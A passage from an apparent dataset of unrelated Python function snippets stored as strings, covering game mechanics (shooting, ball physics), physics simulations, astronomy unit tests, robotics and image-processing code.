ob.Void(self.target.x_obj, self.target.y_obj)\n self.grid.obj_list[self.target] = void", "def execute(self, cast):\n ball = cast[\"ball\"][0] # there's only one\n paddle = cast[\"paddle\"][0] # there's only one\n bricks = cast[\"brick\"]\n for brick in bricks:\n if ball.get_position().equals(brick.get_position()):\n bricks.remove(brick)\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n\n if ball.get_position().get_y() == paddle.get_position().get_y():\n if ball.get_position().get_x() >= paddle.get_position().get_x() and ball.get_position().get_x() <= (paddle.get_position().get_x() + 11):\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n\n if ball.get_position().get_y() == 0:\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n \n if ball.get_position().get_x() == 0 or ball.get_position().get_x() == constants.MAX_X:\n ball.set_velocity(Point.reverse_x(ball.get_velocity()))\n\n if ball.get_position().get_y() == constants.MAX_Y:\n quit()", "def main():\n # run_test_go_straight_inches()\n # run_test_turn_degrees()\n # run_test_spin_degrees()\n beep_if_blob_is_bigger_than(3000)", "def HellFire_ShotGuns(self):\n\t\tprint(self.name.title() + \" is now shotting.\")", "def shoot(self, pos_to_shoot):\n return [SHOOT, pos_to_shoot]", "def drop_boxes(self): \r\n model = loader.load_model('models/box.egg')\r\n model.set_pos(-0.5, -0.5, -0.5)\r\n model.flatten_light()\r\n shape = 
BulletBoxShape(LVector3(0.5, 0.5, 0.5))\r\n ahead = self.vehicleNP.get_pos() + self.vehicle.get_forward_vector()*15\r\n \r\n for i in range(6):\r\n node = BulletRigidBodyNode('Box')\r\n node.set_mass(5.0)\r\n node.add_shape(shape)\r\n node.set_deactivation_enabled(False)\r\n np = render.attach_new_node(node)\r\n np.set_pos(ahead.x, ahead.y, ahead.z + i*2)\r\n self.world.attach(node)\r\n model.copy_to(np)", "def expose_test(self):\n with self.lock:\n self.dark = 1\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n imagesize = (self.expArea[3] - self.expArea[1],\n self.expArea[2] - self.expArea[0])\n self.data = np.ones(shape=imagesize, dtype=np.uint16)\n self.tend = time.time()", "def shooting_target(agent):\n ball = agent.info.ball\n car = agent.info.my_car\n car_to_ball = ball.location - car.location\n backline_intersect = line_backline_intersect(\n agent.their_goal.center[1], vec2(car.location), vec2(car_to_ball))\n if abs(backline_intersect) < 700:\n goal_to_ball = normalize(car.location - ball.location)\n error = 0\n else:\n # Right of the ball\n if -500 > backline_intersect:\n target = agent.their_goal.corners[3] + vec3(400, 0, 0)\n # Left of the ball\n elif backline_intersect > 500:\n target = agent.their_goal.corners[2] - vec3(400, 0, 0)\n goal_to_ball = normalize(ball.location - target)\n # Subtract the goal to car vector\n difference = goal_to_ball - normalize(car.location - target)\n error = cap(abs(difference[0]) + abs(difference[1]), 0, 5)\n\n goal_to_ball_2d = vec2(goal_to_ball[0], goal_to_ball[1])\n test_vector_2d = dot(rotation(0.5 * math.pi), goal_to_ball_2d)\n test_vector = vec3(test_vector_2d[0], test_vector_2d[1], 0)\n\n distance = cap((40 + distance_2d(ball.location, car.location) * (error ** 2)) / 1.8, 0, 4000)\n location = ball.location + vec3((goal_to_ball[0] * distance), goal_to_ball[1] * distance, 0)\n\n # this adjusts the target based on the ball velocity perpendicular\n # to the direction we're trying to hit it\n multiplier = cap(distance_2d(car.location, location) / 1500, 0, 2)\n distance_modifier = cap(dot(test_vector, ball.velocity) * multiplier, -1000, 1000)\n location += vec3(\n test_vector[0] * distance_modifier, test_vector[1] * distance_modifier, 0)\n\n # another target adjustment that applies if the ball is close to the wall\n extra = 3850 - abs(location[0])\n if extra < 0:\n location[0] = cap(location[0], -3850, 3850)\n location[1] = location[1] + (-sign(agent.team) * cap(extra, -800, 800))\n return location", "def testEllipticalGaussian(self):\n\n width, height = 200, 200\n xcen, ycen = 0.5*width, 0.5*height\n #\n # Make the object\n #\n gal = afwImage.ImageF(afwGeom.ExtentI(width, height))\n a, b, theta = float(10), float(5), 20\n flux = 1e4\n I0 = flux/(2*math.pi*a*b)\n\n c, s = math.cos(math.radians(theta)), math.sin(math.radians(theta))\n for y in range(height):\n for x in range(width):\n dx, dy = x - xcen, y - ycen\n u = c*dx + s*dy\n v = -s*dx + c*dy\n val = I0*math.exp(-0.5*((u/a)**2 + (v/b)**2))\n if val < 0:\n val = 0\n gal.set(x, y, val)\n\n objImg = afwImage.makeExposure(afwImage.makeMaskedImage(gal))\n objImg.getMaskedImage().getVariance().set(1.0)\n del gal\n objImg.setXY0(afwGeom.Point2I(1234, 5678))\n #\n # We need a PSF to be able to centroid well. Cf. 
#2540\n #\n FWHM = 5\n ksize = 25 # size of desired kernel\n objImg.setPsf(measAlg.DoubleGaussianPsf(ksize, ksize,\n FWHM/(2*math.sqrt(2*math.log(2))), 1, 0.1))\n \n\n if display:\n frame = 0\n ds9.mtv(objImg, frame=frame, title=\"Elliptical\")\n\n self.assertAlmostEqual(1.0, afwMath.makeStatistics(objImg.getMaskedImage().getImage(),\n afwMath.SUM).getValue()/flux)\n #\n # Test elliptical apertures\n #\n #\n msConfig = measAlg.SourceMeasurementConfig()\n msConfig.algorithms.names.add(\"flux.aperture.elliptical\")\n radii = math.sqrt(a*b)*numpy.array([0.45, 1.0, 2.0, 3.0, 10.0,])\n\n msConfig.algorithms[\"flux.aperture.elliptical\"].radii = radii\n schema = afwTable.SourceTable.makeMinimalSchema()\n ms = msConfig.makeMeasureSources(schema)\n \n table = afwTable.SourceTable.make(schema)\n msConfig.slots.setupTable(table)\n source = table.makeRecord()\n\n ss = afwDetection.FootprintSet(objImg.getMaskedImage(), afwDetection.Threshold(0.1))\n fp = ss.getFootprints()[0]\n source.setFootprint(fp)\n\n center = fp.getPeaks()[0].getF()\n ms.apply(source, objImg, center)\n\n self.assertEqual(source.get(\"flux.aperture.elliptical.nProfile\"), len(radii))\n\n r0 = 0.0\n if display:\n shape = source.getShape().clone()\n xy = afwGeom.ExtentD(source.getCentroid()) - afwGeom.ExtentD(objImg.getXY0())\n ds9.dot(\"x\", xcen, ycen, ctype=ds9.RED)\n ds9.dot(\"+\", *xy, frame=frame)\n with ds9.Buffering():\n for r, apFlux in zip(radii, source.get(\"flux.aperture.elliptical\")):\n if display: # draw the inner and outer boundaries of the aperture\n shape.scale(r/shape.getDeterminantRadius())\n ds9.dot(shape, *xy, frame=frame)\n\n trueFlux = flux*(math.exp(-r0**2/(2*a*b)) - math.exp(-r**2/(2*a*b)))\n if verbose:\n print \"%5.2f %6.3f%%\" % (r, 100*((trueFlux - apFlux)/flux))\n self.assertAlmostEqual(trueFlux/flux, apFlux/flux, 5)\n r0 = r\n #\n # Now measure some annuli \"by hand\" (we'll repeat this will EllipticalAperture algorithm soon)\n #\n\n for r1, r2 in [(0.0, 0.45*a),\n (0.45*a, 1.0*a),\n ( 1.0*a, 2.0*a),\n ( 2.0*a, 3.0*a),\n ( 3.0*a, 5.0*a),\n ( 3.0*a, 10.0*a),\n ]:\n control = measAlg.SincFluxControl()\n control.radius1 = r1\n control.radius2 = r2\n control.angle = math.radians(theta)\n control.ellipticity = 1 - b/a\n\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(control).build(schema)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n\n if display: # draw the inner and outer boundaries of the aperture\n Mxx = 1\n Myy = (b/a)**2\n\n mxx, mxy, myy = c**2*Mxx + s**2*Myy, c*s*(Mxx - Myy), s**2*Mxx + c**2*Myy\n for r in (r1, r2):\n ds9.dot(\"@:%g,%g,%g\" % (r**2*mxx, r**2*mxy, r**2*myy), xcen, ycen, frame=frame)\n\n mp.apply(source, objImg, center)\n\n self.assertAlmostEqual(math.exp(-0.5*(r1/a)**2) - math.exp(-0.5*(r2/a)**2),\n source.get(control.name)/flux, 5)\n\n control = measAlg.GaussianFluxControl()\n\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(control).build(schema)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n\n objImg.setPsf(None) # no Psf\n mp.apply(source, objImg, center)\n # we haven't provided a PSF, so the built-in aperture correction won't work...but we'll get\n # a result anyway\n # Note that flags.psffactor==True sets flags=True IFF we attempt aperture corrections\n self.assertEqual(source.get(control.name + \".flags\"), False)\n self.assertEqual(source.get(control.name + \".flags.psffactor\"), True)\n gflux = 
source.get(control.name)\n err = gflux/flux - 1\n if abs(err) > 1.5e-5:\n self.assertEqual(gflux, flux, (\"%g, %g: error is %g\" % (gflux, flux, err)))", "def simple_test_vot(self, img, frame_id, gt_bboxes, img_metas=None):\n if frame_id == 0:\n self.init_frame_id = 0\n if self.init_frame_id == frame_id:\n # initialization\n gt_bboxes = gt_bboxes[0][0]\n self.memo = Dict()\n self.memo.bbox = quad2bbox(gt_bboxes)\n self.memo.z_feat, self.memo.avg_channel = self.init(\n img, self.memo.bbox)\n # 1 denotes the initialization state\n bbox_pred = img.new_tensor([1.])\n best_score = -1.\n elif self.init_frame_id > frame_id:\n # 0 denotes unknown state, namely the skipping frame after failure\n bbox_pred = img.new_tensor([0.])\n best_score = -1.\n else:\n # normal tracking state\n best_score, self.memo.bbox = self.track(img, self.memo.bbox,\n self.memo.z_feat,\n self.memo.avg_channel)\n # convert bbox to region\n track_bbox = bbox_cxcywh_to_x1y1wh(self.memo.bbox).cpu().numpy()\n track_region = bbox2region(track_bbox)\n gt_bbox = gt_bboxes[0][0]\n if len(gt_bbox) == 4:\n gt_bbox = bbox_xyxy_to_x1y1wh(gt_bbox)\n gt_region = bbox2region(gt_bbox.cpu().numpy())\n\n if img_metas is not None and 'img_shape' in img_metas[0]:\n image_shape = img_metas[0]['img_shape']\n image_wh = (image_shape[1], image_shape[0])\n else:\n image_wh = None\n Warning('image shape are need when calculating bbox overlap')\n overlap = calculate_region_overlap(\n track_region, gt_region, bounds=image_wh)\n if overlap <= 0:\n # tracking failure\n self.init_frame_id = frame_id + 5\n # 2 denotes the failure state\n bbox_pred = img.new_tensor([2.])\n else:\n bbox_pred = bbox_cxcywh_to_xyxy(self.memo.bbox)\n\n return bbox_pred, best_score", "def test_takes_shot(self):\n player = TestPlayer()\n self.ai.take_shot(player)\n self.assertEqual(1, player.shots_taken)", "def update(self):\r\n \r\n # Desplaza el bloque un píxel hacia abajo.\r\n if self.rect.y > 500:\r\n self.rect.x = random.randrange(10,600) \r\n self.rect.y = random.randrange(-300, -20) \r\n \r\n else:\r\n self.rect.y += 5\r\n \r\n # Si el bloque estuviera muy abajo, lo restablecemos a la parte superior de la pantalla.\r", "def time_step_evolution(self):\n self.box_1.x += self.h * self.box_1.v\n self.box_2.x += self.h * self.box_2.v\n\n if self.box_collision():\n\n aux_v_1 = self.box_1.v\n aux_v_2 = self.box_2.v\n self.box_1.v =\\\n (aux_v_1 * (self.box_1.mass - self.box_2.mass) +\n 2*aux_v_2*self.box_2.mass)/(self.box_1.mass + self.box_2.mass)\n self.box_2.v =\\\n (aux_v_2 * (self.box_2.mass - self.box_1.mass) +\n 2*aux_v_1*self.box_1.mass)/(self.box_2.mass + self.box_1.mass)\n self.coll_counter += 1\n\n elif self.wall_collision():\n\n self.box_1.v = -self.box_1.v\n self.coll_counter += 1", "def test_stokes_drag():\n assert DM.stokes_drag(fluid_velocity=1.0, particle_velocity=0.0,\n diameter=1.0, rho=1.0, fluid_viscosity=1.0) == 18.0", "def bolt_check(self):\n for x in self.get_bolts():\n if x.get_velocity() > 0:\n self.set_plyrbolts(1)", "def test_qasm_simulator_single_shot(self):\n shots = 1\n self.qobj.config.shots = shots\n result = self.backend.run(self.qobj).result()\n self.assertEqual(result.success, True)", "def shoot_fire(self, camera):\n\n cursor_pos = pygame.mouse.get_pos()\n tempMouseRect = pygame.Rect(cursor_pos, (0, 0))\n tempMouseRect = camera.use_cam_rect(tempMouseRect)\n\n relPos = tempMouseRect.topleft\n\n self.intMousePos = relPos\n ang = self.get_shoot_angle(relPos)\n #ang = math.radians(170 - math.degrees(ang))\n ang = math.radians(( (math.degrees(ang)+ 
180 )))\n #ang = int(ang)\n\n if self.canShoot and self.ammo: #and self.is_good_angle(ang):\n self.canShoot = False\n self.ammo -= 1\n self.timer_fire = time.time()\n\n # decide starting position of fireball\n\n xPos = self.rect.centerx\n\n fire = powersC.Fireball((xPos, self.rect.centery), ang, self.direction)\n self.powerGroup.add(fire)", "def pickUpObject(player):\n for treasure in Treasure.List:\n distance2 = (treasure.x-player.x)*(treasure.x-player.x)+(treasure.y-player.y)*(treasure.y-player.y)\n if distance2 < 4 * (treasure.width * treasure.width+ treasure.height*treasure.height):\n if not player.treasureCaptured:\n player.treasureCaptured = True\n treasure.isCaptured = True\n treasure.showCaptured()", "def __init_ground(self, timeout=4):\n box_pose = geometry_msgs.msg.PoseStamped()\n box_pose.header.frame_id = self._robot.get_planning_frame()\n box_pose.pose.position.z = -0.025\n\n if self._ground_box_name not in self._scene.get_known_object_names():\n rospy.sleep(2)\n self._scene.add_box(self._ground_box_name, box_pose, size=(2, 2, 0.02))\n return self._wait_for_state_update(name=self._ground_box_name, is_known=True, timeout=timeout) \n else:\n self._loginfo(\"Box already in the Planning scene, skipping\")\n return True", "def sling_action():\n global mouse_distance\n global rope_lenght\n global angle\n global x_mouse\n global y_mouse\n # Fixing bird to the sling rope\n v = vector((sling_x, sling_y), (x_mouse, y_mouse))\n uv = unit_vector(v)\n uv1 = uv[0]\n uv2 = uv[1]\n # mouse_distance = distance(sling_x, sling_y, x_mouse, y_mouse)\n sling = Vec2d(sling_x, sling_y)\n mouse = Vec2d(x_mouse, y_mouse)\n mouse_distance = (sling - mouse).length\n\n pu = (uv1*rope_lenght+sling_x, uv2*rope_lenght+sling_y)\n bigger_rope = 102\n x_redbird = x_mouse - 20\n y_redbird = y_mouse - 20\n if mouse_distance > rope_lenght:\n pux, puy = pu\n pux -= 20\n puy -= 20\n pul = pux, puy\n screen.blit(redbird, pul)\n pu2 = (uv1*bigger_rope+sling_x, uv2*bigger_rope+sling_y)\n pygame.draw.line(screen, (0, 0, 0), (sling2_x, sling2_y), pu2, 5)\n screen.blit(redbird, pul)\n pygame.draw.line(screen, (0, 0, 0), (sling_x, sling_y), pu2, 5)\n else:\n mouse_distance += 10\n pu3 = (uv1*mouse_distance+sling_x, uv2*mouse_distance+sling_y)\n pygame.draw.line(screen, (0, 0, 0), (sling2_x, sling2_y), pu3, 5)\n screen.blit(redbird, (x_redbird, y_redbird))\n pygame.draw.line(screen, (0, 0, 0), (sling_x, sling_y), pu3, 5)\n # Angle of impulse\n dy = y_mouse - sling_y\n dx = x_mouse - sling_x\n if dx == 0:\n dx = 0.00000000000001\n angle = math.atan((float(dy))/dx)", "def box_collision_info(self):\r\n position = np.zeros((self.Npart,3)) # antall part, dim, iterasjoner\r\n position[:,:] = np.random.uniform(0,1e-6, size = (self.Npart,3))\r\n velocity = np.zeros((self.Npart,3))\r\n velocity[:,:] = np.random.normal(0,self.sigma,size = (self.Npart,3))\r\n\r\n part_collided = 0\r\n part_escaped = 0\r\n momentum = 0\r\n\r\n print 'engine started'\r\n for i in xrange(1,self.n):\r\n #collision\r\n position += velocity*dt\r\n l_hole = position[:,0:2] > self.L/4\r\n h_hole = position[:,0:2] < (3*self.L)/4\r\n pos_xy = np.logical_and(l_hole, h_hole)\r\n pos_xy = np.logical_and(pos_xy[:,0], pos_xy[:,1])\r\n pos_z = position[:,2] < 0\r\n esc_part = np.logical_and(pos_z, pos_xy)\r\n\r\n #velocity[esc_part] = velocity[esc_part]\r\n part_escaped += np.sum(esc_part)\r\n\r\n for j in xrange(0,3):\r\n impact_wall_pos = np.logical_and(position[:,j] > 0,\r\n position[:,j] < self.L)\r\n velocity[np.logical_not(impact_wall_pos),j] = -velocity[\r\n 
np.logical_not(impact_wall_pos),j]\r\n\r\n\r\n if j == 0:\r\n part_collided += np.sum(np.logical_not(impact_wall_pos),j)\r\n momentum += np.sum(2*self.m*abs(velocity[np.logical_not(\r\n impact_wall_pos),j]))\r\n\r\n\r\n\r\n position[position < 0] = 0\r\n position[position >self.L] = self.L\r\n\r\n particle_collided = part_collided/2\r\n return position, velocity,part_escaped, impact_wall_pos, particle_collided, momentum", "def shoot_bullets(self):\n\t\tBullet(self.birb.rect.x + 75, self.birb.rect.y + 35, self)", "async def play_shotgun(game_state) -> None:\n big_inside, lesser_counter = count_zombies(game_state)\n if big_inside and lesser_counter == 0:\n play_weapon(game_state, Supply.SHOTGUN, strong=True)\n elif lesser_counter <= 1 and not big_inside:\n play_weapon(game_state, Supply.SHOTGUN)\n elif lesser_counter > 1 and not big_inside:\n play_weapon(game_state, Supply.SHOTGUN, destroyed=False)\n play_weapon(game_state, Supply.SHOTGUN)\n else:\n message = 'What survivors should do [0/1]?\\n[0]: kill big zombie\\n' \\\n f'[1]: kill up to two lesser zombies ({lesser_counter} inside)\\n>'\n action = await get_action(game_state, message, ['0', '1'])\n if action == '0':\n play_weapon(game_state, Supply.SHOTGUN, strong=True)\n elif lesser_counter == 1:\n play_weapon(game_state, Supply.SHOTGUN)\n else:\n play_weapon(game_state, Supply.SHOTGUN, destroyed=False)\n play_weapon(game_state, Supply.SHOTGUN)", "def track_treasures(self, boom_pos):\n treasures = self.gui.map.get_treasures()\n for treasure in treasures:\n if self.if_near_boom(treasure.get_pos(), boom_pos):\n treasure.switch_img()", "def pulse(relay_controller, debug):\n if debug >= BASIC:\n print \"Boxes.%s\" % inspect.currentframe().f_code.co_name\n FlashEffects.pulse(relay_controller, constants.CH_ALL_BOXES)", "def setBox(self, box: Vector):\r\n if not isinstance(box, Vector):\r\n raise TypeError(\"Box Property should be a vector\")\r\n\r\n if self._fixture is not None:\r\n while kge.Physics.world.locked:\r\n continue\r\n\r\n self._box = box\r\n self._fixture.shape.box = *self._box,", "def shoot(self, a_fighter):\n if self.get_ammos()>0:\n lostPoints = int(self.get_damage() / a_fighter.get_agility())\n lostPoints = int(lostPoints * uniform(0.5,1)) # some random added\n a_fighter.__health_points = a_fighter.get_health_points() - lostPoints\n self.__ammos -= 1 # remove one ammo\n return a_fighter.get_health_points()", "def img_show_unit_ball(img):\n side = int(np.sqrt(img.shape[0]))\n plt.imshow(img.reshape(side, side) / np.linalg.norm(img))\n plt.show()", "def run(self):\n ball = memory.world_objects.getObjPtr(core.WO_BALL)\n if not ball.seen or not ball.fromTopCamera:\n return\n \n # Ball coordinates\n ball_x, ball_y = ball.imageCenterX, ball.imageCenterY\n \n # Calculate forward velocity\n ball_distance = ball.visionDistance / 1000\n print('Ball distance: {}'.format(ball_distance))\n ball_distance = min(ball_distance, DISTANCE_THRESHOLD)\n \n # Cache the ball distances\n PursueBall.ball_distances = (PursueBall.ball_distances + [ball_distance])[-30:]\n print('Ball distances: {}'.format(PursueBall.ball_distances))\n slope = sum(PursueBall.ball_distances[-10:])/10 - sum(PursueBall.ball_distances[:10])/10\n print('Slope: {} - {} = {}'.format(sum(PursueBall.ball_distances[-10:]) / 10,\n sum(PursueBall.ball_distances[:10]) / 10,\n slope))\n print('Input: {}'.format(1 / slope if slope else 1))\n \n \n # Get the maximum velocity to be 1\n forward_vel = ball_distance * DISTANCE_CONSTANT\n forward_vel *= MAX_FORWARD_VELOCITY\n forward_vel = 
max(MIN_FORWARD_VELOCITY, forward_vel)\n print('forward velocity: {}'.format(forward_vel))\n \n # Calculate sideways velocity\n angular_vel = -(ball_x-160.0) / 160.0 * MAX_ANGULAR_VELOCITY\n print('Sideways Amount: {}'.format(angular_vel))\n \n commands.setWalkVelocity(forward_vel, 0, angular_vel)", "def add_soot(image: Image, fract: float = 0.1) -> Image:\n data = np.array(image).copy()\n\n shape = data.shape\n data = data.flatten()\n how_many = int(data.size * fract)\n mask = np.random.choice(data.size, how_many)\n data[mask] = 0\n data = data.reshape(shape)\n\n image = Image.fromarray(data)\n return image", "def checkball(self):\r\n for ball in self.overlapping_sprites:\r\n ball.bottom=self.top\r\n if math.fabs(ball.x-self.x)<math.fabs(ball.x-self.left) and math.fabs(ball.x-self.x)<math.fabs(ball.x-self.right):\r\n ball.vertbounce()\r\n if math.fabs(ball.x-self.left)<math.fabs(ball.x-self.x) and math.fabs(ball.x-self.left)<math.fabs(ball.x-self.right):\r\n ball.leftbounce()\r\n if math.fabs(ball.x-self.right)<math.fabs(ball.x-self.left) and math.fabs(ball.x-self.right)<math.fabs(ball.x-self.x):\r\n ball.rightbounce()\r\n self.points.value+=10\r\n if self.points.value==500:\r\n ball.ballchange()\r\n elif self.points.value==2000:\r\n ball.ballchange()\r\n elif self.points.value==4500:\r\n ball.ballchange()\r\n elif self.points.value==10000:\r\n ball.ballchange()", "def __init__(self, trigbox = None, mychan = 2, V2mA = 1.0):\r\n if not trigbox:\r\n from Caio import TriggerBox\r\n trigbox = TriggerBox.TTL()\r\n self.trigbox = trigbox\r\n self.my_chan = mychan-1 #Base 0.\r\n self.V2mA = float(V2mA) #5.0 = 10V:50mA\r\n self.intensity = 0", "def testEllipticalGaussian(self):\n #\n # Make and the objects\n #\n ab_vals = [(1.0, 0.0), (2.0, 0.0), (2.0, 0.1), ]\n nIter = 2\n for dx in (0.0, 0.5,):\n for dy in (0.0, 0.5,):\n for alpha, b in ab_vals:\n for objFlux in (1e2, 1e3, 1e4, 1e5, 1e6, ):\n flux, fluxErr, flags, psfFlux = self.makeAndMeasure(objFlux, alpha, b, dx=dx, dy=dy)\n \n failFlux = math.isnan(flux) or flags or abs(flux/objFlux - 1) > 0.25e-2\n \n ID = \"alpha,b %4.1f, %5.2f dx,dy = %.1f,%.1f \" % (alpha, b, dx, dy)\n msg = \"%s flux_DeconvolvedPsf: %9.4g v. 
exact value %9.4g (error %5.2f%%) (psfFlux error %5.2f%%)\" % \\\n (ID, flux, objFlux, 100*(flux/objFlux - 1), 100*(psfFlux/objFlux - 1))\n\n if False:\n print msg\n continue\n\n self.assertFalse(failFlux, msg)", "def test_WIMP_cut_region_on_true_data(bolo_name, mass, analysis):\n\t\n\n\t#Load 2D PDF\n\tfWIMP2D, f = PyRPl.open_ROOT_object(\"./ROOT_files/WIMP_PDF2D_\" + analysis + \".root\", \"WIMP_\" + mass + \"_GeV\")\n\n\t#Load cut value on PDF for 95% WIMP box\n\tcut_val_90, cut_val_99 = 0,0\n\twith open (\"./Text_files/WIMP_PDF_90_and_99_cut_value_\" + analysis + \".txt\", \"r\") as fcut:\n\t\tstuff = [elem.rstrip().split(\",\") for elem in fcut.readlines()]\n\t\tfor elem in stuff:\n\t\t\tmass_val = elem[0]\n\t\t\tif int(mass)==int(mass_val):\n\t\t\t\tcut_val_90 = float(elem[1])\n\t\t\t\tcut_val_99 = float(elem[2])\n\t\n\n\tdata_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_Analyse_ERA/Fond_ERA_merged/\"\n\tfilou = TFile(data_path + bolo_name + \"_\" + analysis + \"_fond.root\", \"read\")\n\ttree = filou.Get(\"data\")\n\tnum_pass_cut =0\n\n\thpass = TH2F(\"hpass\", \"hpass\", 100, 0, 15, 100, 0, 15)\n\n\t# #T Check that the events are found where expected\n\t# arr1 = np.random.uniform(0,15,size=(200000,2))\n\t# for i in range(arr1.shape[0]):\n\t# \tPDF_val = fWIMP2D.Eval(arr1[i][0], arr1[i][1])\n\t# \tif (cut_val_99<PDF_val<cut_val_90):\n\t# \t# if (cut_val_99<PDF_val<cut_val_90):\n\t# \t\tnum_pass_cut+=1\n\t# \t\thpass.Fill(arr1[i][0], arr1[i][1])\t\t\n\n\t# hpass.Draw()\n\t# raw_input()\n\n\tfor k in range(tree.GetEntries()):\n\t\ttree.GetEntry(k)\n\t\tER=(1+8./3)*0.5*(tree.EC1+tree.EC2)-0.33*(1.5*tree.EIA+4*tree.EIB+1.5*tree.EIC+4*tree.EID)\n\t\tPDF_val = fWIMP2D.Eval(ER, 0.5*(tree.EIB+tree.EID))\n\t\tif (cut_val_99<PDF_val<cut_val_90 and 0.5*(tree.EIB+tree.EID)>0.7):\n\t\t# if (cut_val_99<PDF_val<cut_val_90):\n\t\t\tnum_pass_cut+=1\n\t\t\thpass.Fill(0.5*(tree.EC1+tree.EC2), 0.5*(tree.EIB+tree.EID))\n\n\tprint num_pass_cut\n\thpass.Draw()\n\traw_input()", "def stitch_img_result_pano(mam, mbm, diff, totalBox, prevBox, img_arrs, prevImg, prevNum, imgNum, min_matches=4, max_stdev=20, tmin=-10, tmax=40, verbose=True, rgb_query=False,inv=False):\n \n if verbose: print('Filt. 
matches: '+str(len(mam))+', stdev: ' + str(round(np.std(mam-mbm, axis=0).mean(),2)))\n # Filter for conditions\n if len(mam) > min_matches and np.std(mam-mbm, axis=0).mean() < max_stdev:\n # New box position before adjustment for expanding total box\n if rgb_query is not False:\n newBox=[int(np.round(prevBox[0]+diff[1])), int(np.round(prevBox[0]+diff[1]))+rgb_query.shape[0], int(np.round(prevBox[2]+diff[0])),int(np.round(prevBox[2]+diff[0]))+rgb_query.shape[1]] \n else: newBox=[int(np.round(prevBox[0]+diff[1])), int(np.round(prevBox[1]+diff[1])), int(np.round(prevBox[2]+diff[0])),int(np.round(prevBox[3]+diff[0]))] \n pos = [0,0] # Position for previously merged images\n modBox = [0,0,0,0] # Position for new image\n # If bounds on axis 0 go beyond total\n if newBox[0]<0 and newBox[1] > totalBox[0]:\n xmin, xmax = imgNum, imgNum\n modBox[1], modBox[0], pos[0] = newBox[1]-newBox[0], 0, abs(newBox[0])\n totalBox[0]=newBox[1]-min(newBox[0],0)\n elif newBox[0]<0:\n xmin = imgNum\n modBox[1], modBox[0], pos[0] = newBox[1]-newBox[0], 0, abs(newBox[0])\n totalBox[0]+=abs(newBox[0])\n elif newBox[1] > totalBox[0]:\n xmax = imgNum\n modBox[1], modBox[0] = newBox[1], newBox[0]\n totalBox[0]=newBox[1]\n else: modBox[0], modBox[1] = newBox[0], newBox[1] \n \n # If bounds on axis 1 go beyond total\n if newBox[2]<0 and newBox[3] > totalBox[1]:\n ymin, ymax = imgNum, imgNum\n modBox[3], modBox[2], pos[1] = newBox[3]-newBox[2], 0, abs(newBox[2])\n totalBox[1]=newBox[3]-min(newBox[2],0)\n elif newBox[2]<0:\n ymin = imgNum\n modBox[3], modBox[2], pos[1] = newBox[3]-newBox[2], 0, abs(newBox[2])\n totalBox[1]+=abs(newBox[2])\n elif newBox[3] > totalBox[1]:\n ymax = imgNum\n modBox[3], modBox[2] = newBox[3], newBox[2]\n totalBox[1] = newBox[3] #-min(newBox[2],0)\n else: modBox[2], modBox[3] = newBox[2], newBox[3]\n prevBox = modBox \n print(modBox)\n \n if len(img_arrs[1].shape) == 2:\n single = (img_arrs[1]-tmin)*255/tmax\n queryImg = np.dstack((single,single,single)).astype(np.uint8)\n else: queryImg = rgb_query\n result = np.zeros([totalBox[0],totalBox[1],3])\n if inv:\n result[modBox[0]:modBox[1], modBox[2]:modBox[3],:] = queryImg\n #prevImg.data[max(0,newBox[0]):min(newBox[1],prevImg.shape[0]), max(0,newBox[2]):min(newBox[3],prevImg.shape[1]),:] += np.array(queryImg[max(0,-newBox[0]):min(queryImg.shape[0],prevImg.shape[0]-max(newBox[0],0)), max(0,-newBox[2]):min(queryImg.shape[1],prevImg.shape[1]+max(-newBox[2],0)),:]*(prevImg.mask[max(0,newBox[0]):min(newBox[1],prevImg.shape[0]), max(0,newBox[2]):min(newBox[3],prevImg.shape[1]),:]))\n prevImg.data[max(newBox[0],0):min(newBox[1],prevImg.shape[0]), max(newBox[2],0):min(newBox[3],prevImg.shape[1]),:] += np.array(queryImg[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2]),:]*prevImg.mask[max(newBox[0],0):min(newBox[1],prevImg.shape[0]), max(newBox[2],0):min(newBox[3],prevImg.shape[1]),:])\n result[pos[0]:pos[0]+prevImg.shape[0],pos[1]:pos[1]+prevImg.shape[1],:] = prevImg \n else: \n result[pos[0]:pos[0]+prevImg.shape[0],pos[1]:pos[1]+prevImg.shape[1],:] = prevImg\n print(-min(newBox[0],0),min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0),min(queryImg.shape[1],prevImg.shape[1]-newBox[2]))\n queryImg.data[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2])] += np.array(prevImg[max(0,newBox[0]):min(prevImg.shape[0],newBox[1]), 
max(0,newBox[2]):min(prevImg.shape[1],newBox[3]),:]*(queryImg.mask[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2])]))\n result[modBox[0]:modBox[1], modBox[2]:modBox[3],:] = queryImg\n print('Images {} and {} merged.'.format(str(prevNum),str(imgNum)))\n prevNum, prevImg = imgNum, result\n else: print('Images {} and {}, poor matching'.format(str(prevNum),str(imgNum)))\n return totalBox, prevNum, prevImg, prevBox", "def fire_bullet(self):\n if self.time_til_drop > 0:\n self.time_til_drop -= 1\n else:\n new_boss_projectile = BossProjectile(x = self.x)\n games.screen.add(new_boss_projectile)\n\n # set buffer to approx 30% of pizza height, regardless of pizza speed \n self.time_til_drop = int(new_boss_projectile.height * 1.3 / BossProjectile.speed) + 1", "def test_blackbody_overflow():\n photlam = u.photon / (u.cm ** 2 * u.s * u.AA)\n wave = [0.0, 1000.0, 100000.0, 1e55] # Angstrom\n temp = 10000.0 # Kelvin\n bb = BlackBody(temperature=temp * u.K, scale=1.0)\n with pytest.warns(\n AstropyUserWarning,\n match=r'Input contains invalid wavelength/frequency 